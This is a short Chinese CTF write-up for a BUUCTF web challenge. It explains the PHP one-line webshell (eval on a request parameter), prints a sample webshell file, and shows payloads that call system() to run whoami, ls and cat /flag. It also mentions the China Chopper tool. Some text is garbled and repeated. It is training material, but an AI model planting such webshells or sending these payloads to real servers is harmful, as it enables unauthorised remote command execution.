BUUCTF-Web-Sql注入-
题目链接:BUUCTF
类型:签到题
知识点: php一句话木马(eval函数
)
解题过程
这道题目属于签到题,解题之前先来了解一下php一句话木马,最基础的一句话木马由eval()
内置变量$_POST/$_GET
组成,eval()
函数用于将字符串转换为php代码执行,而内置变量
P
O
S
T
和
_POST和
POST和_GET存放用户请求参数,恶意用户通过将一句话木马文件上传到网页目录中,然后访问此文件构造恶意的php代码实现目标机器的增删改查,可以做一个小实验
- mm.php
<?php
eval($_GET['cmd']);
?>
放在本地web目录下访问mm.php
页面,因为是GET传参所以直接通过url将php代码传入到网页变量cmd
中,如下
?cmd=echo 123
当然也可以传入system()
等执行系统命令函数?cmd=system('whoami');
再回到原来的题目,根据页面回显猜测可能存在一句话木马,构造恶意代码通过POST方法传入到网页变量Syc
中
Syc=system(ls);
这边要注意网页有一个html隐写,通过Ctrl+a或者F12查看源代码就可以看到执行命令的回显了
最后在根目录下找到flag,直接使用cat
得到flagcat /flag
除此之外还可以用中国菜刀连接来得到flag
64957)]
除此之外还可以用中国菜刀连接来得到flag